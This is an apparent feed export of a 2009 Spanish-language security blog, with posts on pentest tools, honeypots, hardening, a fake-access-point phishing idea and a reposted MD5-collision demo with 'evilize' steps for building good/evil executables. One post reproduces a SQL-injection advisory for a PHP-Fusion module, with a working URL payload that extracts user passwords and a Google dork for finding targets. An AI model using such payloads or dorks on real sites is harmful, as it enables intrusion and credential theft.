tag:blogger.com,1999:blog-74908175706521803122024-03-06T03:00:22.062-03:00Security HackSitio personal de Ariel M. Liguori De GottigAriel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.comBlogger41125tag:blogger.com,1999:blog-7490817570652180312.post-91247148336837062222009-05-05T01:01:00.001-03:002009-05-05T01:01:01.049-03:00Ldap Injector.Como algunos recordarán en la BH EU 08 Chema y José Parada nos presentarón <a href="http://www.blackhat.com/presentations/bh-europe-08/Alonso-Parada/Whitepaper/bh-eu-08-alonso-parada-WP.pdf">un artículo sobre LDAP Injection & Blind Ldap Injection</a> en el cual además de explicarnos los conceptos que se esconden detrás de estás técnicas utilizaban una herramienta para lograr sus propósitos (malignos por cierto :) ), dicha herramienta acaba de ser liberada, tiene un nombre muy descriptivo<a href="http://www.informatica64.com/foca/download/ldapInjector_0_2_1_0.zip"><i><b> LDAP Injector</b></i></a> y ya puede ser descargada <a href="http://www.informatica64.com/foca/download/ldapInjector_0_2_1_0.zip">aquí</a>. Aprovechenla!<br />
<br />
Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-79628945842770423262009-05-04T20:55:00.000-03:002009-05-04T20:55:30.390-03:00Foca 0.7.6.4 Released: Analizando MetaDatos por doquier!Finalmente Chema (a.k.a. <i>El Maligno</i>) nos ha dejada por completo el manual del usuario de la <b>FOCA</b>, la cual podemos acceder a través de la web en <a href="http://www.informatica64.com/FOCA/">http://www.informatica64.com/FOCA/</a> o descargarla aquí <a href="http://www.informatica64.com/DownloadFOCA/">http://www.informatica64.com/DownloadFOCA/</a> , como muchos ya sabrán la FOCA es una excelente herramienta para la extracción y analisis de metadatos que se encuentren en archivos publicados en la web. Gracias Chema!<br />
<br />
Links al manual del usuario:<br />
- <a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-i-de-iv.html">FOCA: Manual de Usuario [I de IV]</a><br />
- <a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-ii-de-iv.html">FOCA: Manual de Usuario [II de IV]</a><br />
- <a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-iii-de-iv.html">FOCA: Manual de Usuario [III de IV]</a><br />
- <a href="http://elladodelmal.blogspot.com/2009/04/foca-manual-de-usuario-iv-de-iv.html">FOCA: Manual de Usuario [IV de IV]</a> <br />
<br />
Más info: <br />
<a href="http://elladodelmal.blogspot.com/"> - Un Informático del lado del mal</a>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-51440749068712218842009-03-23T10:54:00.000-03:002009-03-23T10:54:35.057-03:00Creando un punto de acceso falso Y utilizándolo para phising.-El viernes pasado a último momento antes de salir de la oficina me encontré con una nota de <a href="http://opensec.es/">OpenSec</a> en la cual hacían referencia a la posibilidad de <a href="http://opensec.es/2009/03/20/creando-un-punto-de-acceso-falso-airbase-ng/">crear un punto de acceso falso con la utilizacion de airbase-ng</a> , en su post describen todo el procedimiento para lograr esta tarea. Tras leerlo me fue imposible no decirme a mi mismo.. que buena oportunidad para el Phising! Lamentablemente no es una buena noticia, no obstante es una realidad que seguramente ya esta ocurriendo.<br />
<br />
En que consiste este <i><b>nuevo concepto de Phising</b></i> en el cual la victima es la culpable por utilizar una red que no es de su propiedad. Supongamos que con el procedimiento redactado por la gente de OpenSec creamos un punto de acceso con un nombre llamativo y tentador (Wifi-HighSpeed Gratis o similares). Muchos usuarios se conectaran y en principio nada malo ocurriria salvo que un chico malo este detrás de todo esto. Y como podría ser.. simple creando páginas falsas de home banking, cuentas de email y demás, recordemos que él es el owner del punto de acceso y puede manejarnos a su antojo. No entrare en más detalles pero está claro que la configuracion de un servidor DNS para hacer este tipo de cosas no es demasiado dificil, tranquilamente podríamos crearnos un fake gmail,homebank, etc y redirigir esas peticiones a nuestro server (que inclusive puede estar localmente).<br />
<br />
Asi que tengan cuidado en las Redes que se coenctan!<br />
<br />
Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-83282234845854526452009-03-19T09:09:00.003-03:002009-03-19T10:19:05.064-03:00HoneyBoys: La eterna persecución.-Este es un post que me había prometido, sobre todo al oír por millones de lados hablar de <a href="http://es.wikipedia.org/wiki/Honeypot">honeypots</a> y <a href="http://es.wikipedia.org/wiki/Honeynet">honeynets</a>. Como ya muchos saben los honeypots no son más que dispositivos que buscan atraer a crackers para analizar su comportamiento y en particular para descubrirlos (aunque esto no funcione siempre así). Siguiendo esta línea de conceptos nacieron las HoneyNets en las cuales ya no se trata de dispositivos que se encargan de esa labor sino de una red destinada solamente a ello. Obviamente esto evoluciona día a día y hay <a href="http://www.honeynet.org.es/">numerosos</a> <a href="http://www.honeynet.org.mx/">proyectos</a> destinados a llevar a cabo esta misión, así mismo nuevos conceptos surgen con el paso del tiempo como ser los <a href="http://en.wikipedia.org/wiki/Honeyclient">Honey Clients</a> de los cuales <a href="http://blog.s21sec.com/2009/03/honeyclient-aka-ir-buscarla.html">recientemente se ha empezado a hablar</a>.<br />Realmente es algo que da para hablar y nos muestra como los chicos buenos (HoneyBoys desde ahora) destinan su ingenio y tiempo para descubrir nuevas amenazas, factores de ataques, etc. Un apluaso para ellos y una pauta a seguir para nosotros y aqui puntualmente me refiero a los argentinos, <span style="font-size:130%;"><span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);"><br /><br /></span></span><div style="text-align: center;"><span style="font-size:130%;"><span style="font-weight: bold; font-style: italic; color: rgb(255, 0, 0);">¿Para cuando una HoneyNet made in Argentina?</span></span><br /></div><br /><span style="font-style: italic;">Links de Interes:</span><br /><ul><li><a href="http://www.honeynet.org.mx/">Proyecto HoneyNet Mexico</a></li><li><a href="http://www.honeynet.org.es/">Proyecto HoneyNet España</a></li><li><a href="http://blog.segu-info.com.ar/">Segu-Info</a> y <a href="http://blog.s21sec.com/">S21Sec</a>.</li></ul><br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-30494251165400137022009-03-13T15:31:00.003-02:002009-03-13T15:35:21.652-02:00Más Emulación - Links InteresantesPara que este fin de semana puedan practicar hasta el cansancio les dejo varios de los links que me asesoran a la hora de incursionar en esta área:<br /><br /><a href="http://www.andersonalves.net/">Anderson Alves WebPage</a><br /><a href="http://www.netemu.cn/">NetEMU</a><br /><a href="http://7200emu.hacki.at/">Hacki's</a><br /><br />Infaltables a la hora de querer emular algo ;-)Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-26843093297979532222009-03-13T13:29:00.002-02:002009-03-13T14:51:07.484-02:00Jugando con un IPS-4215 Cisco [En Casa]Como ya les había adelantado <a href="http://sechack.blogspot.com/2009/03/emula-emulador.html">en un post pasado</a> hoy en día la "emulación" como fuente de potencial conocimiento y expertise esta siendo aprovechada. Un claro ejemplo es la posibilidad de emular(en este caso) un IPS de Cisco, en particular un IPS-4215 v5 (Luego haremos el upgrade correspondiente).<br /><br />Les dejo a continuación una breve explicación dada por einval de como funciona ésto y también como ponerlo en práctica, yo ya lo he probado y exitosamente he incorporado este dispositivo a mi laboratorio de pruebas (del cual hablaremos más adelante).<br /><br /><a href="http://www.zengl.net/Cisco_IPS/">Running IPSv5 on VMware by Einval</a><br /><br />Si no lo pueden hacer funcionar avísenme porque tengo la imagen de la vm lista para subir a la red.<br /><br />Saludos,<br />ALAriel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-55976417728303171042009-03-11T08:49:00.002-02:002009-03-11T08:56:02.643-02:00Videos de Asegur@IT V.-Ya estan disponibles los vides de la demo del Asegur@IT V, pueden encontrarlos como ya saben en el <a href="http://www.slideshare.net/chemai64">slideshare de Chema</a> o si son peresozos pueden darse una vuelta por <a href="http://elladodelmal.blogspot.com/2009/03/asegurit-v-online.html">la página del maligno</a> y otra por la de <a href="http://conexioninversa.blogspot.com/2009/03/videos-de-las-demos-del-asegurit.html">conexión inversa</a>.<br />Espero que les guste.<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-613207413998214932009-03-10T09:40:00.002-02:002009-03-10T10:30:08.195-02:00Hardening, hay cosas que debemos tener en cuenta.Hoy he leído en el <a href="http://blog.segu-info.com.ar">blog de segu-info</a> una noticia acerca de "<a href="http://blog.segu-info.com.ar/2009/03/hardening-basico-de-gnulinux-e.html">Hardening básico de GNU/Linux e instalación y configuración básica de Snort</a>" en donde en realidad lo que hay es un video que nos muestra como proteger en simples pasos nuestro S.O.<br />He aquí algo que pasa por mi mente cada vez que hablo o leo de "Hardening", acaso no queremos todos que nuestro sistema sea seguro? entonces porque no nos interesamos en ver como sería un apropiado hardening del SO que poseemos.<br />Puede que muchos lo vean como una reflexión que se logra con el paso del tiempo y de la experiencia, sin embargo creo yo que debe ser todo lo contrario ya que es esencial y básico proteger nuestro sistema e inclusive el más novato de todos debe estar familiarizado con los pasos a seguir para lograr esa meta.Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-8294445473374503882009-03-05T15:12:00.003-02:002009-03-05T15:18:00.615-02:00Listas de Seguridad Informática interesantes.-Aquí les dejo un link con las listas de SI a las que "conviene" estar suscritos:<br /><br />http://seclists.org/<br /><br />De aquí les recomiendo ampliamente estar suscritos a:<br /><br />- Full Disclosure<br />- Pen-Test<br />- Bugtraq<br /><br />Las demás son de interés general, ustedes ya conocerán sus gustos mejor que yo así que los dejo elegir ;-)Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-39963550961987623922009-01-30T08:13:00.005-02:002009-01-30T09:02:06.520-02:00Penetration Test Frameworks: AS/400 & WirelessHoy les traigo algo que puede llegar a resultar muy interesante a la hora de la realización de pen testing, sí, más frameworks ;-).<br />La gente de <a href="http://www.security-database.com">Security Database</a> ha desarrollado un Framework para pen-test de sistemas AS/400, si bien aún esta en fase "Beta" podemos acceder a ella y a más información aquí: <a href="http://www.security-database.com/toolswatch/AS-400-Auditing-Framework-Beta.html">AS 400 Auditing Framework Tool</a>.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.security-database.com/toolswatch/IMG/png/AS400_Auditing.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 120px; height: 120px;" src="http://www.security-database.com/toolswatch/IMG/png/AS400_Auditing.png" border="0" alt="" /></a><br /><br />Por otra parte también agrego información de un framework ya existente para el pen-testing de Redes wireless: <a href="http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html">Wireless Penetration</a>.<br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html_files/image.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;width: 120px; height: 120px;" src="http://www.wirelessdefence.org/Contents/Wireless%20Pen%20Test%20Framework.html_files/image.png" border="0" alt="" /></a><br /><br /><br />Espero que les sirva tanto como a mi.<br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-89476876516438308142009-01-14T10:14:00.002-02:002009-01-14T10:34:56.257-02:00Análisis de Malware.-Por la web, realmente no recuerdo donde, me he encontrado con el link a este documento en donde nos introducen en una suerte de FAQ sobre Malware y, sobre todo, en el análisis del mismo.<br /><br /><a href="http://docs.google.com/View?docid=ddkp262g_4ftzh5mhg">Análisis de Malware</a><br /><br />Enjoy it!<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-79234148280383795712009-01-13T08:45:00.002-02:002009-01-13T09:04:56.031-02:00Videos y Presentaciones: DISI 2008Toda la información referente al DISI 2008 se encuentra disponible en el <a href="http://www.youtube.com/user/upm">canal de youtube de la UPM</a>. Les recomiendo que le den un vistazo, vale la pena ;-)<br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-90717146819588776572009-01-12T15:06:00.003-02:002009-01-12T15:12:31.345-02:00MD5 Collision DemoComparto con ustedes esta nota que leí <a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/">aquí</a>.<br /><br /><span style="font-weight:bold;">Collisions in the MD5 cryptographic hash function</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> It is now well-known that the crytographic hash function MD5 has been broken. In March 2005, Xiaoyun Wang and Hongbo Yu of Shandong University in China published an <a href="http://www.infosec.sdu.edu.cn/paper/md5-attack.pdf">article</a> in which they describe an algorithm that can find two different sequences of 128 bytes with the same MD5 hash. One famous such pair is the following: <pre>d131dd02c5e6eec4693d9a0698aff95c 2fcab5<span style="color:red;">8</span>712467eab4004583eb8fb7f89<br />55ad340609f4b30283e4888325<span style="color:red;">7</span>1415a 085125e8f7cdc99fd91dbd<span style="color:red;">f</span>280373c5b<br />d8823e3156348f5bae6dacd436c919c6 dd53e2<span style="color:red;">b</span>487da03fd02396306d248cda0<br />e99f33420f577ee8ce54b67080<span style="color:red;">a</span>80d1e c69821bcb6a8839396f965<span style="color:red;">2</span>b6ff72a70<br /></pre> and <pre>d131dd02c5e6eec4693d9a0698aff95c 2fcab5<span style="color:red;">0</span>712467eab4004583eb8fb7f89<br />55ad340609f4b30283e4888325<span style="color:red;">f</span>1415a 085125e8f7cdc99fd91dbd<span style="color:red;">7</span>280373c5b<br />d8823e3156348f5bae6dacd436c919c6 dd53e2<span style="color:red;">3</span>487da03fd02396306d248cda0<br />e99f33420f577ee8ce54b67080<span style="color:red;">2</span>80d1e c69821bcb6a8839396f965<span style="color:red;">a</span>b6ff72a70<br /></pre> Each of these blocks has MD5 hash 79054025255fb1a26e4bc422aef54eb4. Ben Laurie has a nice website that <a href="http://www.links.org/?p=6" althref="http://web.archive.org/web/20060210033801/http://www.shmoo.com/md5-collision.html">visualizes this MD5 collision</a>. For a non-technical, though slightly outdated, introduction to hash functions, see Steve Friedle's <a href="http://www.unixwiz.net/techtips/iguide-crypto-hashes.html">Illustrated Guide</a>. </td></tr></tbody></table> <span style="font-weight:bold;">Exploits</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> As we will explain below, the algorithm of Wang and Yu can be used to create files of arbitrary length that have identical MD5 hashes, and that differ only in 128 bytes somewhere in the middle of the file. Several people have used this technique to create pairs of interesting files with identical MD5 hashes: <ul><li>Magnus Daum and Stefan Lucks have created <a href="http://www.cits.rub.de/MD5Collisions/">two PostScript files with identical MD5 hash</a>, of which one is a letter of recommendation, and the other is a security clearance. </li><li>Eduardo Diaz has described a <a href="http://www.codeproject.com/dotnet/HackingMd5.asp">scheme</a> by which two programs could be packed into two archives with identical MD5 hash. A special "extractor" program turn one archive into a "good" program and the other into an "evil" one. </li><li>In 2007, Marc Stevens, Arjen K. Lenstra, and Benne de Weger used an improved version of Wang and Yu's attack known as the <a href="http://www.win.tue.nl/hashclash/SoftIntCodeSign/">chosen prefix collision</a> method to produce two executable files with the same MD5 hash, but different behaviors. Unlike the old method, where the two files could only differ in a few carefully chosen bits, the chosen prefix method allows two completely arbitrary files to have the same MD5 hash, by appending a few thousand bytes at the end of each file. (Added Jul 27, 2008). </li></ul> </td></tr></tbody></table> <span style="font-weight:bold;">An evil pair of executable programs</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> The following is an improvement of Diaz's example, which does not need a special extractor. Here are two pairs of executable programs (one pair runs on Windows, one pair on Linux). <ul><li><b>Windows version:</b> <ul><li><a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/hello.exe">hello.exe</a>. MD5 Sum: cdc47d670159eef60916ca03a9d4a007 </li><li><a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/erase.exe">erase.exe</a>. MD5 Sum: cdc47d670159eef60916ca03a9d4a007 </li></ul> </li><li><b>Linux version (i386):</b> <ul><li><a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/hello">hello</a>. MD5 Sum: da5c61e1edc0f18337e46418e48c1290 </li><li><a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/erase">erase</a>. MD5 Sum: da5c61e1edc0f18337e46418e48c1290 </li></ul> </li></ul> These programs must be run from the console. </td></tr></tbody></table><br /><span style="font-weight:bold;">How it works</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> The above files were generated by exploiting two facts: the block structure of the MD5 function, and the fact that Wang and Yu's technique works for an arbitrary initialization vector. To understand what this means, it is useful to have a general idea of how the MD5 function processes its input. This is done by an iteration method known as the Merkle-Damgard method. A given input file is first padded so that its length will be a multiple of 64 bytes. It is then divided into individual 64-byte blocks <i>M</i><sub>0</sub>, <i>M</i><sub>1</sub>, ..., <i>M</i><sub><i>n</i>-1</sub>. The MD5 hash is computed by computing a sequence of 16-byte <b>states</b> <i>s</i><sub>0</sub>, ..., <i>s</i><sub><i>n</i></sub>, according to the rule: <nobr><i>s</i><sub><i>i</i>+1</sub> = <i>f</i>(<i>s</i><sub><i>i</i></sub>, <i>M<sub>i</sub></i>)</nobr>, where <i>f</i> is a certain fixed (and complicated) function. Here, the initial state <i>s</i><sub>0</sub> is fixed, and is called the <b>initialization vector</b>. The final state <i>s</i><sub><i>n</i></sub> is the computed MD5 hash. <p> The method of Wang and Yu makes it possible, for a given initialization vector <i>s</i>, to find two pairs of blocks <span style="color:red;"><i>M</i>,<i>M</i>'</span> and <span style="color:red;"><i>N</i>,<i>N</i>'</span>, such that <i>f</i>(<i>f</i>(<i>s</i>, <span style="color:red;"><i>M</i></span>), <span style="color:red;"><i>M</i>'</span>) = <i>f</i>(<i>f</i>(<i>s</i>, <span style="color:red;"><i>N</i></span>), <span style="color:red;"><i>N</i>'</span>). It is important that this works for any initialization vector <i>s</i>, and not just for the standard initialization vector <i>s</i><sub>0</sub>. </p><p> Combining these observations, it is possible to find pairs of files of arbitrary length, which are identical except for 128 bytes somewhere in the middle of the file, and which have identical MD5 hash. Indeed, let us write the two files as sequences of 64-byte blocks: </p><p> <nobr> <i>M</i><sub>0</sub>, <i>M</i><sub>1</sub>, ..., <i>M</i><sub><i>i</i>-1</sub>, <span style="color:red;"><i>M</i><sub><i>i</i></sub>, <i>M</i><sub><i>i</i>+1</sub></span>, <i>M</i><sub><i>i</i>+2</sub>, ..., <i>M</i><sub><i>n</i></sub>, </nobr> </p><p> <nobr> <i>M</i><sub>0</sub>, <i>M</i><sub>1</sub>, ..., <i>M</i><sub><i>i</i>-1</sub>, <span style="color:red;"><i>N</i><sub><i>i</i></sub>, <i>N</i><sub><i>i</i>+1</sub></span>, <i>M</i><sub><i>i</i>+2</sub>, ..., <i>M</i><sub><i>n</i></sub>. </nobr> </p><p> The blocks at the beginning of the files, <i>M</i><sub>0</sub>, ..., <i>M</i><sub><i>i</i>-1</sub>, can be chosen arbitrarily. Suppose that the internal state of the MD5 hash function after processing these blocks is <i>s</i><sub><i>i</i></sub>. Now we can apply Wang and Yu's method to the initialization vector <i>s</i><sub><i>i</i></sub>, to find two pairs of blocks <span style="color:red;"><i>M</i><sub><i>i</i></sub>, <i>M</i><sub><i>i</i>+1</sub></span> and <span style="color:red;"><i>N</i><sub><i>i</i></sub>, <i>N</i><sub><i>i</i>+1</sub></span>, such that </p><p> <i>s</i><sub><i>i</i>+2</sub> = <i>f</i>(<i>f</i>(<i>s</i><sub><i>i</i></sub>, <span style="color:red;"><i>M<sub>i</sub></i></span>), <span style="color:red;"><i>M</i><sub><i>i</i>+1</sub></span>) = <i>f</i>(<i>f</i>(<i>s</i><sub><i>i</i></sub>, <span style="color:red;"><i>N<sub>i</sub></i></span>), <span style="color:red;"><i>N</i><sub><i>i</i>+1</sub></span>). </p><p> This guarantees that the internal state <i>s</i><sub><i>i</i>+2</sub> after the <i>i</i>+2st block will be the same for the two files. Finally, the remaining blocks <i>M</i><sub><i>i</i>+2</sub>, ..., <i>M</i><sub><i>n</i></sub> can again be chosen arbitrarily. </p><p> So how can we use this technique to produce a pair of programs (or postscript files) that have identical MD5 hash, yet behave in arbitrary different ways? This is simple. All we have to do is write the two programs like this: </p><p> </p><pre><b>Program 1:</b> if (data1 == data1) then { good_program } else { evil_program }<br /><b>Program 2:</b> if (data2 == data1) then { good_program } else { evil_program }<br /></pre> <p> and arrange things so that "data1" = <span style="color:red;"><i>M</i><sub><i>i</i></sub>, <i>M</i><sub><i>i</i>+1</sub></span> and "data2" = <span style="color:red;"><i>N</i><sub><i>i</i></sub>, <i>N</i><sub><i>i</i>+1</sub></span> in the above scheme. This can even be done in a compiled program, by first compiling it with dummy values for data1 and data2, and later replacing them with the properly computed values. </p></td></tr></tbody></table> <span style="font-weight:bold;">Do it yourself: the "evilize" library</span> <table border="0"><tbody><tr><td width="10"><br /></td><td> Here, you can download the software that I used to create MD5-colliding executable files. <ul><li>Download: <a href="http://www.mscs.dal.ca/%7Eselinger/md5collision/evilize-0.1.tar.gz">evilize-0.1.tar.gz</a>. </li></ul> This software is based on Patrick Stach's implementation of Wang and Yu's algorithm. You can find his original implementation <a href="http://www.stachliu.com/md5coll.c">here</a>. <h4>Quick usage instructions:</h4> <p> Note for Windows users: the below instructions are for Unix/Linux. On Windows, you may have to append ".exe" to the names of executable files. Also, to use "make", you must have the GNU tools installed and working. </p><ol><li>Unpack the archive and build the library and tools: <pre> tar zxf evilize-0.1.tar.gz<br /> cd evilize-0.1<br /> make<br /></pre> This creates the programs "evilize", "md5coll", and the object file "goodevil.o". </li><li> Create a C program with multiple behaviors. Instead of the usual top-level function main(), write two separate top-level functions main_good() and main_evil(). See the file hello-erase.c for a simple example. </li><li> Compile your program and link against goodevil.o. For example: <pre> gcc hello-erase.c goodevil.o -o hello-erase<br /></pre> </li><li> Run the following command to create an initialization vector: <pre> ./evilize hello-erase -i<br /></pre> </li><li> Create an MD5 collision by running the following command (but replace the vector on the command line with the one you found in step 4): <pre> ./md5coll 0x23d3e487 0x3e3ea619 0xc7bdd6fa 0x2d0271e7 > init.txt<br /></pre> Note: this step can take several hours. </li><li> Create a pair of good and evil programs by running: <pre> ./evilize hello-erase -c init.txt -g good -e evil<br /></pre> Here "good" and "evil" are the names of the two programs generated, and "hello-erase" is the name of the program you created in step 3. <p> NOTE: steps 4-6 can also be done in a single step, as follows: </p><pre> ./evilize hello-erase -g good -e evil<br /></pre> However, I prefer to do the steps separately, since step 5 takes so long. </li><li> Check the MD5 checksums of the files "good" and "evil"; they should be the same. </li><li> Run the programs "good" and "evil" - they should exhibit the two different behaviors that you programmed in step 2. </li></ol></td></tr></tbody></table><br /><br />Fuente: <a href="http://www.mathstat.dal.ca/%7Eselinger/">Peter Selinger's WebPage</a>.Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-86850370405460042122009-01-10T01:00:00.001-02:002009-01-10T01:00:00.851-02:00PenTest de Oracle DataBasesComo prometí...<br />El Penetration Testing suele involucrar diversas áreas, entre ellas podemos destacar las bases de datos. En este post les mostraré las _no_tan_ conocidas herramientas para realizar PenTesting de bases de datos Oracle.<br /><span style="font-weight: bold;"><br /><a href="http://www.cqure.net/wp/oscanner/">OScanner</a></span>: <span style="font-style: italic;">Oscanner is an Oracle assessment framework developed in Java. It has a plugin-based architecture and comes with a couple of plugins that currently do:<br /><br />- Sid Enumeration<br />- Passwords tests (common & dictionary)<br />- Enumerate Oracle version<br />- Enumerate account roles<br />- Enumerate account privileges<br />- Enumerate account hashes<br />- Enumerate audit information<br />- Enumerate password policies<br />- Enumerate database links<br /><br />The results are given in a graphical java tree.</span><br /><br /><span style="font-weight: bold;"><a href="http://www.cqure.net/wp/test/">Oracle Auditing Tools (OAT)</a></span>: <span style="font-style: italic;">The Oracle Auditing Tools is a toolkit that could be used to audit security within Oracle database servers.</span><br /><br /><span style="font-weight: bold;"><a href="http://www.cqure.net/wp/dbpwaudit/">DBPwAudit</a></span>: <span style="font-style: italic;">DBPwAudit is a Java tool that allows you to perform online audits of password quality for several database engines. The application design allows for easy adding of additional database drivers by simply copying new JDBC drivers to the jdbc directory. Configuration is performed in two files, the aliases.conf file is used to map drivers to aliases and the rules.conf tells the application how to handle error messages from the scan.</span><br /><br /><span style="font-weight: bold;"><a href="http://www.cqure.net/wp/sidguesser/">SidGuesser</a></span>: <span style="font-style: italic;">Guesses sids/instances against an Oracle database according to a predefined dictionary file.</span><br /><br /><br /><span style="font-style: italic;">Links de interes:</span><br /><ul><li><a href="http://www.securityfocus.com/infocus/1689">Introduction to Simple Oracle Auditing</a></li><li><a href="http://www.petefinnigan.com/papers/audit.sql">Peter Finnigan - Audit.sql</a></li><li><a href="https://metalink.oracle.com/">Oracle Metalink</a></li><li><a href="http://www.pentest.co.uk/cgi-bin/viewcat.cgi?cat=whitepapers">Pappers de PenTest en Oracle DBs</a></li></ul>Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-39408046739333852822009-01-09T14:13:00.002-02:002009-01-09T14:17:16.687-02:00XSS - Cross Site ScriptingHoy he vuelto a desenterrar este tema, ya por mi olvidado debido a su limitado e ineficaz uso (igualmente, siempre hay alguien a quien podremos hacer caer ¬¬ ). Sin embargo, vengo aquí solo para mostrarles un par de documentos con buena información referente al tema:<br /><br /><a href="http://www.cis.upenn.edu/~cis551/XSS.pdf">XSS - Cross Site Scripting Explained (PDF en inglés).</a><br /><a href="http://www.soulblack.com.ar/repo/papers/minituto-xss.pdf">Cross Site Scripting - By Soulblack (PDF en Español).</a><br /><br />Saludos,Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-53144241804018752172009-01-09T09:09:00.002-02:002009-01-09T10:00:54.643-02:00Sql Injection Vulnerability en PHP-Fusion.Usar con cuidado y con fines educativos solamente :)<br /><br />----------------------------------------------------------------<br />Script : PHP-Fusion Mod vArcade 1.8<br />Type : Sql Injection Vulnerability<br />Risk : <span style="font-weight: bold; color: rgb(255, 0, 0);">High</span><br />----------------------------------------------------------------<br />Download From : <a href="http://venue.nu/">http://venue.nu/</a><br />----------------------------------------------------------------<br />Discovered by : Khashayar Fereidani<br />My Official Website : <a href="http://fereidani.ir/">http://FEREIDANI.IR</a><br />Our Team Website : <a href="http://ircrash.com/">http://IRCRASH.COM</a><br />Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com<br /><br />----------------------------------------------------------------<br />Sql Injection Vulnerability :<br /><br />Vulnerable address : <span style="font-weight: bold;">http://[host]/[path]/infusions/varcade/callcomments.php?comment_id=9999%27+union+select+0,user_name,2,3,4,5,6,user_password+from+fusion_users+where+user_id=1/*</span><br /><br /><span style="font-weight: bold; font-style: italic;">Google Dark : inurl:/infusions/varcade/</span><br />----------------------------------------------------------------<br /> Tnx : God<br /><a href="http://ircrash.com/"> http://IRCRASH.COM</a> <a href="http://fereidani.ir/">http://FEREIDANI.IR</a><br />----------------------------------------------------------------Ariel M. Liguori de Gottighttp://www.blogger.com/profile/02714929794781699420noreply@blogger.com0tag:blogger.com,1999:blog-7490817570652180312.post-63048621450731261972009-01-08T10:27:00.003-02:002009-01-08T10:38:05.445-02:00Penetration Testing Tools<span style="font-weight: bold;"><span style="font-weight: bold;">Una lista muy completa de herramientas para PenTesting, toda la info fue extraída de <a href="http://www.forinsect.de/pentest/pentest-tools.html">forinsect.</a></span><br /><br />Packet Shaper:</span><br />• Nemesis: a command line packet shaper<br />• Packit: The Packet Toolkit - A network packet shaper.<br />• Hping by Antirez: a command line TCP/IP packet shaper<br />• Sing: stands for 'Send ICMP Nasty Garbage'; sends fully customizeable ICMP packets<br />• Scapy: a new python-based packet generator<br /><br /><span style="font-weight: bold;">Password Cracker/Login Hacker:</span><br />• John the Ripper: a well-known password cracker for Windows and *nix Systems<br />• Djohn: a distributed password cracker based on "John the Ripper"<br />• Cain & Abel: an advanced password recovery tool for windows systems. It sniffs the network packets an cracks authentication brute-force or with dictionary attacks.<br />• Project RainbowCrack: Advanced instant NT password cracker<br />• Rainbowtables: The shmoo group provides pre-generated rainbow tables for bittorrent download. The tables are generated with RainbowCrack (see above).<br />• Windows NT password recovery tool by Peter Nordahl<br />• THC-Dialup Login Hacker by THC. It tries to guess username and password against the modem carrier. As far as I know the only available dialup password guesser for *NIX.<br />• Hydra by THC: a multi-protocol login hacker. Hydra is also integrated with Nessus.<br />• Medusa: parallel network login auditor<br />• THC imap bruter: a very fast imap password brute forcer<br />• x25bru: a login/password bruteforcer for x25 pad<br />• Crowbar: a generic web brute force tool (Windows only; requires .NET Framework)<br />• MDCrack-NG: a very fast MD4/MD5/NTLMv1 hash cracker; works optionally with precomputed hash tables<br /><span id="fullpost"><br /><span style="font-weight: bold;">Advanced Sniffers:</span><br />• Wireshark (formerly known as Ethereal): an open source network protocol analyzer<br />• Dsniff by Dug Song: a combination of very useful sniffer and man-in-the-middle attack tools<br />• Ettercap: a multipurpose sniffer/interceptor/logger for switched LAN environments<br />• aimsniffer: monitors AOL instant messager communication on the network<br />• 4G8: a tool 